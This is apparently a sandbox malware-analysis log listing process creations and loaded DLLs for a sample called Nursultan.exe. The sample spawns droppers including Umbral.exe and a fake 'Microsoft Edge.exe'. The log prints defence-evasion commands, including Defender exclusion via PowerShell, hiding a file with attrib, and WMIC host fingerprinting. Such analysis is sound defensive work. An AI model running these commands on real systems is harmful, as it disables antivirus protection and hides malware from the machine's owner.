                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\Desktop\Nursultan.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\timeout.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: version.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: propsys.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: edputil.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: urlmon.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: iertutil.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: srvcli.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: netutils.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: wintypes.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: appresolver.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: bcp47langs.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: slc.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: userenv.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: sppc.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\Desktop\Nursultan.exe  Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: wintypes.dll
